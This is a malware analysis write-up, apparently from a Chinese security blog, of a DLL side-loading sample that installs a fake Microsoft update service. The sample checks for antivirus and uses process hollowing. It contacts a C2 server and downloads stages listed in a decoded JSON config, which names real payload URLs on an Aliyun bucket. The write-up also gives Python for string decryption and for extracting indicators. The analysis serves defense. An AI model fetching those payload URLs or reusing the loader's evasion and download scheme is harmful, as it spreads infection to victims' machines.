Basic information
QQExternal.exe loads tinyxml.dll (DLL side-loading).
Forged certificate.
PDB path:
E:\其它文件\InternetRedirectNew\tinyxmlHook\Release\tinyxml.pdb
Entry point: dllmain
Flow
Creates a service. Service info:
  Service name: MicrosoftSetupSystemTask
  Display name: Microsoft Setup Update System Network Task
  Description: Microsoft 安装更新系统任务。请勿阻止或禁用这项服务,否则无法更新系统网络。 (roughly: "Microsoft setup update system task. Do not block or disable this service, otherwise the system network cannot be updated.")
  Binary path: C:\ProgramData\Microsoft\Setup\QQExternal.exe
If 360 or Kaspersky processes are detected: it sends the HTTP request directly and moves on to the next stage.
HTTP request:
http://[www.proxyconsole.com->ip]:8250/api.php?act=get_run_core&app=10001
(http://www.proxyconsole.com:8250/api.php?act=get_run_core&app=10001)
Response:
After base64 decoding:

```json
{
  "FirstSelect": 2,
  "CoreFile": [{
    "Type": 1,
    "Enable": true,
    "Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/PuppetLib.dll",
    "Hash": "567376A02E00A595874F5776784E238D"
  }, {
    "Type": 2,
    "Enable": true,
    "Name": "QQExternal.exe",
    "Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/QQExternal.exe",
    "Hash": "A8253A842C0AD6C406D0770C1483B90D",
    "RelyOnName": "ChangToAviDllQmeWeb.dll",
    "RelyOnAddress": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/ChangToAviDllQmeWeb.dll",
    "RelyOnHash": "70E6018CA089BF7B03AADEC149D986FD"
  }, {
    "Type": 3,
    "Enable": true,
    "Name": "Dis.exe",
    "Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/Dis.exe",
    "Hash": "7C477B3785EC1980014B6CADD4C60C08",
    "CommandLine": "GoGoGo"
  }]
}
```
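As an added example (not code from the post or from the analysed sample), the Python below mirrors the stage just described from the analyst's side: base64-decode the api.php answer, parse the CoreFile JSON, list every download URL together with its declared hash (RelyOn dependencies included), and check a fetched file against that hash. The config, URLs and payload bytes are constructed stand-ins; the 32-hex-character Hash field is assumed to be MD5, which the page does not state explicitly.

```python
"""Parse the base64-encoded CoreFile config and verify downloaded payloads."""
import base64
import hashlib
import json


def parse_core_config(b64_text: str) -> dict:
    """Decode the api.php answer: base64 wrapping a JSON object."""
    return json.loads(base64.b64decode(b64_text).decode("utf-8"))


def extract_iocs(cfg: dict) -> list:
    """Return (url, hash) pairs for every enabled entry, RelyOn dependencies included."""
    iocs = []
    for entry in cfg.get("CoreFile", []):
        if not entry.get("Enable", False):
            continue
        iocs.append((entry["Address"], entry["Hash"].lower()))
        if "RelyOnAddress" in entry:
            iocs.append((entry["RelyOnAddress"], entry["RelyOnHash"].lower()))
    return iocs


def verify_payload(data: bytes, expected_hash: str) -> bool:
    """Check a fetched file against the declared hash (assumed MD5: 32 hex chars)."""
    return hashlib.md5(data).hexdigest() == expected_hash.lower()


# Constructed stand-in for a downloaded payload (not the real PuppetLib.dll).
SAMPLE_BLOB = b"MZ-constructed-stand-in-payload"

# Constructed config with the same shape as the decoded JSON on the page.
# URLs are placeholders; the first hash is the MD5 of SAMPLE_BLOB, the rest are dummies.
SAMPLE_CFG = {
    "FirstSelect": 2,
    "CoreFile": [
        {"Type": 1, "Enable": True,
         "Address": "https://cdn.example/Run/PuppetLib.dll",
         "Hash": hashlib.md5(SAMPLE_BLOB).hexdigest().upper()},
        {"Type": 2, "Enable": True, "Name": "QQExternal.exe",
         "Address": "https://cdn.example/Run/QQExternal.exe",
         "Hash": "A" * 32,
         "RelyOnName": "ChangToAviDllQmeWeb.dll",
         "RelyOnAddress": "https://cdn.example/Run/ChangToAviDllQmeWeb.dll",
         "RelyOnHash": "B" * 32},
        {"Type": 3, "Enable": True, "Name": "Dis.exe",
         "Address": "https://cdn.example/Run/Dis.exe",
         "Hash": "C" * 32, "CommandLine": "GoGoGo"},
        # Disabled entry (constructed) to show that extract_iocs skips it.
        {"Type": 4, "Enable": False,
         "Address": "https://cdn.example/Run/Unused.exe", "Hash": "D" * 32},
    ],
}
SAMPLE_B64 = base64.b64encode(json.dumps(SAMPLE_CFG).encode()).decode()

if __name__ == "__main__":
    cfg = parse_core_config(SAMPLE_B64)
    for url, h in extract_iocs(cfg):
        print(f"{h}  {url}")
    print("payload ok:", verify_payload(SAMPLE_BLOB, cfg["CoreFile"][0]["Hash"]))
```

The (url, hash) pairs are what you would push to a blocklist or hunt for in proxy and EDR telemetry; the hash check is the same comparison the loader presumably makes before running a stage, so it also tells you whether a captured file matches the config that referenced it.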
If not detected: calls CreateHollowedProcess through sRDI (the shellcode is the former dllTools.dll).
A second sRDI stage performs the HTTP download; its code is identical to that in tinyxml.dll.
JSON library information and the following path appear in the PE loaded by the second sRDI stage:
E:\其它文件\InternetRedirectNew\Puppet
String obfuscation method
Clearly the well-known "C++ compile-time string encryption" scheme, discussed abroad long ago (c++ - Compile-time string encryption - Stack Overflow). Decoder:
```python
import struct

def xorfunc(buf: bytes, count: int, xorx: int, xory: int) -> bytes:
    # Decode `count` bytes of a compile-time-encrypted string: subtract the
    # per-string byte `xory` from each byte, then XOR with `xorx`.
    ret = b''
    x, y = tuple(struct.pack('<2B', xorx, xory))
    for i in range(count):
        ret += struct.pack('<B', x ^ ((buf[i] - y) & 0xff))
    return ret
```
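The decoder above assumes the two key bytes are already known from the disassembly. As an added example (my code, not the post's), the block below goes one step further than the page: it implements the matching encoder, and recovers the (x, y) pair for an obfuscated blob by trying all 65536 pairs and keeping those whose output is plausible text containing a crib. Because small XOR deltas of x also yield printable text, it returns every matching candidate rather than guessing a single winner. The key pair, plaintext and crib are constructed values, not ones taken from the analysed binary.

```python
"""Key recovery for the XOR-then-add compile-time string encryption."""

# Bytes an analyst accepts as plausible decoded text: printable ASCII plus tab/CR/LF.
PLAUSIBLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def obfuscate(plain: bytes, x: int, y: int) -> bytes:
    """Inverse of the page's decoder: c = ((p ^ x) + y) & 0xff per byte."""
    return bytes(((p ^ x) + y) & 0xFF for p in plain)


def deobfuscate(buf: bytes, x: int, y: int) -> bytes:
    """Same arithmetic as xorfunc on the page: p = x ^ ((c - y) & 0xff)."""
    return bytes(x ^ ((c - y) & 0xFF) for c in buf)


def recover_candidates(buf: bytes, crib: bytes) -> list:
    """Try all 65536 (x, y) pairs; keep those whose output is plausible text
    containing the crib. Returns a list of (x, y, plaintext) tuples."""
    found = []
    for x in range(256):
        for y in range(256):
            plain = deobfuscate(buf, x, y)
            if crib in plain and all(b in PLAUSIBLE for b in plain):
                found.append((x, y, plain))
    return found


# Constructed sample: an analyst-chosen key pair and plaintext, NOT values from the sample.
SAMPLE_KEY = (0x5A, 0x17)
SAMPLE_PLAIN = b"api.php?act=get_run_core&app=10001"
SAMPLE_BLOB = obfuscate(SAMPLE_PLAIN, *SAMPLE_KEY)

if __name__ == "__main__":
    for x, y, plain in recover_candidates(SAMPLE_BLOB, b"api.php"):
        print(f"x=0x{x:02x} y=0x{y:02x} -> {plain!r}")
```

In practice you feed `recover_candidates` the byte array pulled from the binary's .rdata and a crib such as `b"http"` or `b".dll"`; when several candidates survive, the one whose decoded string also ends in a NUL terminator is usually the right one, since these schemes encrypt the whole char array.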
Payload hosting server
https://pro-res1.oss-cn-hangzhou.aliyuncs.com
Tags: hijacking, exe, http, aliyuncs, dll, tinyxml, com. From: https://www.cnblogs.com/DirWang/p/17052636.html